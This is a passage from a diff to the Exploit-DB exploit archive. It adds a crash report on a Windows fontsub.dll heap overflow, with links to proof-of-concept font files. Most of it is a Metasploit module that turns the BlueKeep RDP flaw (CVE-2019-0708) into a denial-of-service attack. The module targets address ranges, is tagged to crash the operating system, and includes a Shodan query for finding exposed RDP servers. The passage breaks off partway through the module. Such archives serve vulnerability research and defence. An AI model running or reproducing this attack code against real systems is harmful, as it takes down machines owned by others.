+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47103.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47113.txt b/exploits/windows/dos/47113.txt
new file mode 100644
index 000000000..c141923f0
--- /dev/null
+++ b/exploits/windows/dos/47113.txt
@@ -0,0 +1,62 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!ComputeFormat4CmapData:
+
+--- cut ---
+(284c.42b4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!ComputeFormat4CmapData+0x1e5:
+00007fff`aa44d295 41897cc304      mov     dword ptr [r11+rax*8+4],edi ds:0000013d`775e8003=????????
+
+0:000> ? r11
+Evaluate expression: 1363507314687 = 0000013d`775e7fff
+
+0:000> ? rax
+Evaluate expression: 0 = 00000000`00000000
+
+0:000> ? edi
+Evaluate expression: 1 = 00000000`00000001
+
+0:000> !heap -p -a r11
+    address 0000013d775e7fff found in
+    _DPH_HEAP_ROOT @ 13d77571000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             13d77572e38:      13d775e7fff                1 -      13d775e7000             2000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffaa44fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffaa448d1d FONTSUB!MergeFormat4Cmap+0x0000000000000261
+    00007fffaa449788 FONTSUB!MergeCmapTables+0x00000000000004d4
+    00007fffaa44b046 FONTSUB!MergeFonts+0x00000000000005a6
+    00007fffaa44baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+    00007fffaa4414b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 0000000c`654fd180 00007fff`aa448e11 FONTSUB!ComputeFormat4CmapData+0x1e5
+01 0000000c`654fd1e0 00007fff`aa449788 FONTSUB!MergeFormat4Cmap+0x355
+02 0000000c`654fd2e0 00007fff`aa44b046 FONTSUB!MergeCmapTables+0x4d4
+03 0000000c`654fd3c0 00007fff`aa44baac FONTSUB!MergeFonts+0x5a6
+04 0000000c`654fd570 00007fff`aa4414b2 FONTSUB!MergeDeltaTTF+0x3ec
+05 0000000c`654fd6b0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+The root cause of the crash seems to be the fact that the MergeFormat4Cmap() function may allocate a 0-sized buffer and pass it to ComputeFormat4CmapData() in the second argument, but the ComputeFormat4CmapData() function assumes that the buffer is at least 8 bytes long, and unconditionally writes two 32-bit values of -1 and 1 into it.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. In order to observe the crash, the PageHeap feature must be enabled in Application Verifier for the FontSub client process, preferably with the "/unaligned" and "/size 0 1" options. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47113.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47120.rb b/exploits/windows/dos/47120.rb
new file mode 100755
index 000000000..2bd87cbc3
--- /dev/null
+++ b/exploits/windows/dos/47120.rb
@@ -0,0 +1,1004 @@
+# Exploit Title: Bluekeep Denial of Service (metasploit module)
+# Shodan Dork: port:3389
+# Date: 07/14/2019
+# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
+# Vendor Homepage: https://microsoft.com
+# Version: all affected RDP services by cve-2019-0708
+# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
+# CVE : 2019-0708
+
+# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  Rank = NormalRanking
+
+  include Msf::Auxiliary::Dos
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
+      'Description'    => %q{
+        This module checks a range of hosts for the CVE-2019-0708 vulnerability
+        by binding the MS_T120 channel outside of its normal slot and sending
+        DoS packets.
+      },
+      'Author'         =>
+      [
+        'National Cyber Security Centre', # Discovery
+        'JaGoTu',                         # Module
+        'zerosum0x0',                     # Module
+        'Tom Sellers',                    # TLS support and documented packets
+        'RAMELLA Sebastien'               # Denial of service module
+      ],
+      'References'     =>
+      [
+        [ 'CVE', '2019-0708' ],
+        [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
+      ],
+      'DisclosureDate' => '2019-05-14',
+      'License'        => MSF_LICENSE,
+      'Notes'          =>
+      {
+        'Stability' => [ CRASH_OS_DOWN ],
+        'AKA'       => ['BlueKeep']
+      }
+    ))
+
+    register_options(
+      [
+        OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
+        OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
+        OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
+        OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
+        OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
+        OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
+      ]
+    )
+  end
+
+  # ------------------------------------------------------------------------- #
+
+  def bin_to_hex(s)
+    return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
+  end
+
+  def bytes_to_bignum(bytesIn, order = "little")
+    bytes = bin_to_hex(bytesIn)
+    if(order == "little")
+      bytes = bytes.scan(/../).reverse.join('')
+    end
+    s = "0x" + bytes
+
+    return(s.to_i(16))
+  end
+
+  ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
+  def int_to_bytestring(daInt, num_chars = nil)
+    unless(num_chars)
+      bits_needed = Math.log(daInt) / Math.log(2)
+      num_chars = (bits_needed / 8.0).ceil
+    end
+    if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
+      [daInt].pack(pack_code)
+    else
+      a = (0..(num_chars)).map{ | i |
+        (( daInt >> i*8 ) & 0xFF ).chr
+      }.join
+      a[0..-2]                                                                 # Seems legit lol!
+    end
+  end
+
+  def open_connection()
+    begin
+      connect()
+      sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
+    rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      vprint_error("Connection error: #{e.message}")
+      return(false)
+    end
+  
+    return(true)
+  end
+
+  def rsa_encrypt(bignum, rsexp, rsmod)
+    return((bignum ** rsexp) % rsmod)
+  end
+
+  # ------------------------------------------------------------------------- #
+
+  ## Used to abruptly abort scanner for a given host.
+  class RdpCommunicationError < StandardError
+  end
+  
+  ## Define standard RDP constants.
+  class RDPConstants
+    PROTOCOL_RDP = 0
+  end
+
+  DEFAULT_CHANNELS_DEFS =
+  "\x04\x00\x00\x00" +                 # channelCount: 4
+
+  ## Channels definitions consist of a name (8 bytes) and options flags
+  ## (4 bytes). Names are up to 7 ANSI characters with null termination.
+  "\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd
+  "\x0f\x00\x00\xc0" +
+  "\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr
+  "\x00\x00\xa0\xc0" +
+  "\x64\x72\x64\x79\x6e\x76\x63" +     # drdynvc
+  "\x00\x00\x00\x80\xc0" +
+  "\x4d\x53\x5f\x54\x31\x32\x30" +     # MS_T120
+  "\x00\x00\x00\x00\x00"
+
+  ## Builds x.224 Data (DT) TPDU - Section 13.7
+  def rdp_build_data_tpdu(data)
+    tpkt_length = data.length + 7
+
+    "\x03\x00" +                                                               # TPKT Header version 03, reserved 0
+    [tpkt_length].pack("S>") +                                                 # TPKT length
+    "\x02\xf0" +                                                               # X.224 Data TPDU (2 bytes)
+    "\x80" +                                                                   # X.224 End Of Transmission (0x80)
+    data
+  end
+
+  ## Build the X.224 packet, encrypt with Standard RDP Security as needed.
+  ## Default channel_id = 0x03eb = 1003.
+  def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
+    flags = 0
+    flags |= 0b1000 if(rdp_sec)                                                # Set SEC_ENCRYPT
+    flags |= 0b1000000 if(client_info)                                         # Set SEC_INFO_PKT
+
+    pdu = ""
+
+    ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
+    ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
+    if(client_info || rdp_sec)
+      pdu << [flags].pack("S<")                                                # flags  "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
+      pdu << "\x00\x00"                                                        # flagsHi
+    end
+
+    if(rdp_sec)
+      ## Encrypt the payload with RDP Standard Encryption.
+      pdu << rdp_hmac(hmackey, data)[0..7]
+      pdu << rdp_rc4_crypt(rc4enckey, data)
+    else
+      pdu << data
+    end
+
+    user_data_len = pdu.length
+    udl_with_flag = 0x8000 | user_data_len
+
+    pkt =  "\x64"                                                              # sendDataRequest
+    pkt << "\x00\x08"                                                          # intiator userId (TODO: for a functional client this isn't static)
+    pkt << channel_id                                                          # channelId
+    pkt << "\x70"                                                              # dataPriority
+    pkt << [udl_with_flag].pack("S>")
+    pkt << pdu
+
+    return(rdp_build_data_tpdu(pkt))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
+  ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
+  def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
+    total_len = data.length + 6
+
+    return(
+      [total_len].pack("S<") +                                                 # totalLength - includes all headers
+      [type].pack("S<") +                                                      # pduType - flags 16 bit, unsigned
+      channel_id +                                                             # PDUSource: 0x03f1 = 1009
+      data
+    )
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
+  ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
+  def rdp_build_share_data_header(type, data)
+    uncompressed_len = data.length + 4
+
+    return(
+      "\xea\x03\x01\x00" +                                                     # shareId: 66538
+      "\x00" +                                                                 # pad1
+      "\x01" +                                                                 # streamID: 1
+      [uncompressed_len].pack("S<") +                                          # uncompressedLength - 16 bit, unsigned int
+      [type].pack("C") +                                                       # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
+      "\x00" +                                                                 # compressedType: 0
+      "\x00\x00" +                                                             # compressedLength: 0
+      data
+    )
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
+  ## Virtual Channel PDU 2.2.6.1
+  def rdp_build_virtual_channel_pdu(flags, data)
+    data_len = data.length
+
+    return(
+      [data_len].pack("L<") +                                                  # length
+      [flags].pack("L<") +                                                     # flags
+      data
+    )
+  end
+
+  def rdp_calculate_rc4_keys(client_random, server_random)
+    ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).
+    preMasterSecret = client_random[0..23] + server_random[0..23]
+
+    ## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
+    ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
+    masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) +  rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
+
+    ## MasterHash(I) = SaltedHash(MasterSecret, I)
+    ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
+    sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) +  rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
+
+    ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
+    initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
+
+    ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
+    initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
+
+    macKey = sessionKeyBlob[0..15]
+
+    return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
+  end
+
+  def rdp_connection_initiation()
+    ## Code to check if RDP is open or not.
+    vprint_status("Verifying RDP protocol...")
+
+    vprint_status("Attempting to connect using RDP security")
+    rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
+
+    received = sock.get_once(-1, 5)
+
+    ## TODO: fix it.
+    if (received and received.include? "\x00\x12\x34\x00")
+      return(true)
+    end
+
+    return(false)
+  end
+
+  ##  FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
+  def rdp_final_hash(k, client_random_bytes, server_random_bytes)
+    md5 = Digest::MD5.new
+
+    md5 << k
+    md5 << client_random_bytes
+    md5 << server_random_bytes
+
+    return([md5.hexdigest].pack("H*"))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
+  ## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
+  ## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
+  ## hmac         = rdp_hmac(mac_salt_key, data_content)                       # hexlified: "22d5aeb486994a0c785dc929a2855923".
+  def rdp_hmac(mac_salt_key, data_content)
+    sha1 = Digest::SHA1.new
+    md5 = Digest::MD5.new
+
+    pad1 = "\x36" * 40
+    pad2 = "\x5c" * 48
+
+    sha1 << mac_salt_key
+    sha1 << pad1
+    sha1 << [data_content.length].pack('<L')
+    sha1 << data_content
+
+    md5 << mac_salt_key
+    md5 << pad2
+    md5 << [sha1.hexdigest].pack("H*")
+
+    return([md5.hexdigest].pack("H*"))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
+  ## Parse Server MCS Connect Response PUD - 2.2.1.4
+  def rdp_parse_connect_response(pkt)
+    ptr = 0
+    rdp_pkt = pkt[0x49..pkt.length]
+
+    while(ptr < rdp_pkt.length)
+      header_type = rdp_pkt[ptr..ptr + 1]
+      header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
+      # vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}")
+
+      if(header_type == "\x02\x0c")
+        # vprint_status("Security header")
+
+        server_random = rdp_pkt[ptr + 20..ptr + 51]
+        public_exponent = rdp_pkt[ptr + 84..ptr + 87]
+
+        modulus = rdp_pkt[ptr + 88..ptr + 151]
+        # vprint_status("modulus_old: #{bin_to_hex(modulus)}")
+
+        rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
+        if(rsa_magic != "RSA1")
+          print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
+          raise RdpCommunicationError
+        end
+        # vprint_status("RSA magic: #{rsa_magic}")
+        
+        bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
+        vprint_status("RSA #{bitlen}-bits")
+
+        modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
+        # vprint_status("modulus_new: #{bin_to_hex(modulus)}")
+      end
+
+      ptr += header_length
+    end
+
+    # vprint_status("SERVER_MODULUS:  #{bin_to_hex(modulus)}")
+    # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
+    # vprint_status("SERVER_RANDOM:   #{bin_to_hex(server_random)}")
+
+    rsmod = bytes_to_bignum(modulus)
+    rsexp = bytes_to_bignum(public_exponent)
+    rsran = bytes_to_bignum(server_random)
+
+    vprint_status("MODULUS:  #{bin_to_hex(modulus)} - #{rsmod.to_s}")
+    vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
+    vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}")
+
+    return rsmod, rsexp, rsran, server_random, bitlen
+  end
+
+  def rdp_rc4_crypt(rc4obj, data)
+    rc4obj.encrypt(data)
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
+  ## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
+  def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
+    sha1 = Digest::SHA1.new
+    md5 = Digest::MD5.new
+
+    sha1 << i_bytes
+    sha1 << s_bytes
+    sha1 << client_random_bytes
+    sha1 << server_random_bytes
+
+    md5 << s_bytes
+    md5 << [sha1.hexdigest].pack("H*")
+
+    return([md5.hexdigest].pack("H*"))
+  end
+
+  def rdp_recv()
+    buffer_1 = sock.get_once(4, 5)
+    raise RdpCommunicationError unless buffer_1                                # nil due to a timeout
+
+    buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5)
+    raise RdpCommunicationError unless buffer_2                                # nil due to a timeout
+
+    vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
+    return(buffer_1 + buffer_2)
+  end
+
+  def rdp_send(data)
+    vprint_status("Send data: #{bin_to_hex(data)}")
+
+    sock.put(data)
+  end
+
+  def rdp_sendrecv(data)
+    rdp_send(data)
+
+    return(rdp_recv())
+  end
+
+  # ------------------------------------------------------------------------- #
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
+  ## Client X.224 Connect Request PDU - 2.2.1.1
+  def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
+    ## Blank username is valid, nil is random.
+    user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
+    tpkt_len = user_name.length + 38
+    x224_len = user_name.length + 33
+
+    return(
+      "\x03\x00" +                                                             # TPKT Header version 03, reserved 0
+      [tpkt_len].pack("S>") +                                                  # TPKT length: 43
+      [x224_len].pack("C") +                                                   # X.224 LengthIndicator
+      "\xe0" +                                                                 # X.224 Type: Connect Request
+      "\x00\x00" +                                                             # dst reference
+      "\x00\x00" +                                                             # src reference
+      "\x00" +                                                                 # class and options
+      "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
+      user_name +                                                              # Identifier "username"
+      "\x0d\x0a" +                                                             # cookie terminator
+      "\x01\x00" +                                                             # Type: RDP Negotiation Request (0x01)
+      "\x08\x00" +                                                             # Length
+      [requested_protocols].pack('L<')                                         # requestedProtocols
+    )
+  end
+
+  # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
+  def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
+    ## After negotiating TLS or NLA the connectInitial packet needs to include the
+    ## protocol selection that the server indicated in its negotiation response.
+
+    ## TODO: If this is pulled into an RDP library then the channel list likely
+    ## needs to be build dynamically. For example, MS_T120 likely should only
+    ## ever be sent as part of checks for CVE-2019-0708.
+
+    ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
+    ## 15 characters + null terminator, converted to unicode
+    ## fixed length - 32 characters total
+    name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
+    name_unicode += "\x00" * (32 - name_unicode.length)
+
+    pdu = "\x7f\x65" +                                                         # T.125 Connect-Initial    (BER: Application 101)
+    "\x82\x01\xb2" +                                                           # Length                   (BER: Length)
+    "\x04\x01\x01" +                                                           # CallingDomainSelector: 1 (BER: OctetString)
+    "\x04\x01\x01" +                                                           # CalledDomainSelector: 1  (BER: OctetString)
+    "\x01\x01\xff" +                                                           # UpwaredFlag: True        (BER: boolean)
+
+    ## Connect-Initial: Target Parameters
+    "\x30\x19" +                                                               # TargetParamenters        (BER: SequenceOf)
+    ## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
+    "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+    ## Connect-Intial: Minimum Parameters
+    "\x30\x19" +                                                               # MinimumParameters        (BER: SequencOf)
+    "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
+
+    ## Connect-Initial: Maximum Parameters
+    "\x30\x1c" +                                                               # MaximumParameters        (BER: SequencOf)
+    "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+    ## Connect-Initial: UserData
+    "\x04\x82\x01\x51" +                                                       # UserData, length 337     (BER: OctetString)
+
+    ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+    "\x00\x05" +                                                               # object length
+    "\x00\x14\x7c\x00\x01" +                                                   # object: OID 0.0.20.124.0.1 = Generic Conference Control
+    "\x81\x48" +                                                               # Length: ??? (Connect PDU)
+    "\x00\x08\x00\x10\x00\x01\xc0\x00" +                                       # T.124 Connect PDU, Conference name 1
+    "\x44\x75\x63\x61" +                                                       # h221NonStandard: 'Duca' (client-to-server H.221 key)
+    "\x81\x3a" +                                                               # Length: ??? (T.124 UserData section)
+
+    ## Client MCS Section - 2.2.1.3
+    "\x01\xc0" +                                                               # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
+    "\xea\x00" +                                                               # Length: 234 (includes header)
+    "\x0a\x00\x08\x00" +                                                       # version: 8.1 (RDP 5.0 -> 8.1)
+    "\x80\x07" +                                                               # desktopWidth: 1920
+    "\x38\x04" +                                                               # desktopHeigth: 1080
+    "\x01\xca" +                                                               # colorDepth: 8 bpp
+    "\x03\xaa" +                                                               # SASSequence: 43523
+    "\x09\x04\x00\x00" +                                                       # keyboardLayout: 1033 (English US)
+    "\xee\x42\x00\x00" +                                                       # clientBuild: ????
+    [name_unicode].pack("a*") +                                                # clientName
+    "\x04\x00\x00\x00" +                                                       # keyboardType: 4 (IBMEnhanced 101 or 102)
+    "\x00\x00\x00\x00" +                                                       # keyboadSubtype: 0
+    "\x0c\x00\x00\x00" +                                                       # keyboardFunctionKey: 12
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +       # imeFileName (64 bytes)
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x01\xca" +                                                               # postBeta2ColorDepth: 8 bpp
+    "\x01\x00" +                                                               # clientProductID: 1
+    "\x00\x00\x00\x00" +                                                       # serialNumber: 0
+    "\x18\x00" +                                                               # highColorDepth: 24 bpp
+    "\x0f\x00" +                                                               # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
+    "\xaf\x07" +                                                               # earlyCapabilityFlags
+    "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" +       # clientDigProductID (64 bytes)
+    "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
+    "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
+    "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
+    "\x07" +                                                                   # connectionType: 7
+    "\x00" +                                                                   # pad1octet
+    
+    ## serverSelectedProtocol - After negotiating TLS or CredSSP this value
+    ## must match the selectedProtocol value from the server's Negotiate
+    ## Connection confirm PDU that was sent before encryption was started.
+    [selected_proto].pack('L<') +                                              # "\x01\x00\x00\x00"
+    
+    "\x56\x02\x00\x00" +
+    "\x50\x01\x00\x00" +
+    "\x00\x00" +
+    "\x64\x00\x00\x00" +
+    "\x64\x00\x00\x00" +
+
+    "\x04\xc0" +                                                               # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
+    "\x0c\x00" +                                                               # Length: 12 (includes header)
+    "\x15\x00\x00\x00" +                                                       # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
+    "\x00\x00\x00\x00" +                                                       # RedirectedSessionID
+    "\x02\xc0" +                                                               # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
+    "\x0c\x00" +                                                               # Length: 12 (includes header)
+    "\x1b\x00\x00\x00" +                                                       # encryptionMethods: 3 (40 bit | 128 bit)
+    "\x00\x00\x00\x00" +                                                       # extEncryptionMethods (French locale only)
+    "\x03\xc0" +                                                               # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
+    "\x38\x00" +                                                               # Length: 56 (includes header)
+    channels_defs
+
+    ## Fix. for packet modification.
+    ## T.125 Connect-Initial
+    size_1 = [pdu.length - 5].pack("s")                                        # Length (BER: Length)
+    pdu[3] = size_1[1]
+    pdu[4] = size_1[0]
+
+    ## Connect-Initial: UserData
+    size_2 = [pdu.length - 102].pack("s")                                      # UserData, length (BER: OctetString)
+    pdu[100] = size_2[1]
+    pdu[101] = size_2[0]
+
+    ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+    size_3 = [pdu.length - 111].pack("s")                                      # Length (Connect PDU)
+    pdu[109] = "\x81"
+    pdu[110] = size_3[0]
+
+    size_4 = [pdu.length - 125].pack("s")                                      # Length (T.124 UserData section)
+    pdu[123] = "\x81"
+    pdu[124] = size_4[0]
+
+    ## Client MCS Section - 2.2.1.3
+    size_5 = [pdu.length - 383].pack("s")                                      # Length (includes header)
+    pdu[385] = size_5[0]
+
+    rdp_build_data_tpdu(pdu)
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
+  ## Client Security Exchange PDU - 2.2.1.10
+  def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
+    encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
+    encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
+
+    bitlen += 8                                                                # Pad with size of TS_SECURITY_PACKET header
+
+    userdata_length = 8 + bitlen
+    userdata_length_low = userdata_length & 0xFF
+    userdata_length_high = userdata_length / 256
+    flags = 0x80 | userdata_length_high
+
+    pdu = "\x64" +                                                             # T.125 sendDataRequest
+    "\x00\x08" +                                                               # intiator userId
+    "\x03\xeb" +                                                               # channelId = 1003
+    "\x70" +                                                                   # dataPriority = high, segmentation = begin | end
+    [flags].pack("C") +
+    [userdata_length_low].pack("C") +                                          # UserData length
+    
+    # TS_SECURITY_PACKET - 2.2.1.10.1
+    "\x01\x00" +                                                               # securityHeader flags
+    "\x00\x00" +                                                               # securityHeader flagsHi
+    [bitlen].pack("L<") +                                                      # TS_ length
+    encrypted_rcran +                                                          # encryptedClientRandom - 64 bytes
+    "\x00\x00\x00\x00\x00\x00\x00\x00"                                         # 8 bytes rear padding (always present)
+
+    return(rdp_build_data_tpdu(pdu))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
+  ## Client MCS Erect Domain Request PDU - 2.2.1.5
+  def pdu_erect_domain_request()
+    pdu = "\x04" +                                                             # T.125 ErectDomainRequest
+    "\x01\x00" +                                                               # subHeight   - length 1, value 0
+    "\x01\x00"                                                                 # subInterval - length 1, value 0
+
+    return(rdp_build_data_tpdu(pdu))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
+  ## Client MCS Attach User Request PDU - 2.2.1.6
+  def pdu_attach_user_request()
+    pdu = "\x28"                                                               # T.125 AttachUserRequest
+
+    return(rdp_build_data_tpdu(pdu))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
+  ## Client MCS Channel Join Request PDU -2.2.1.8
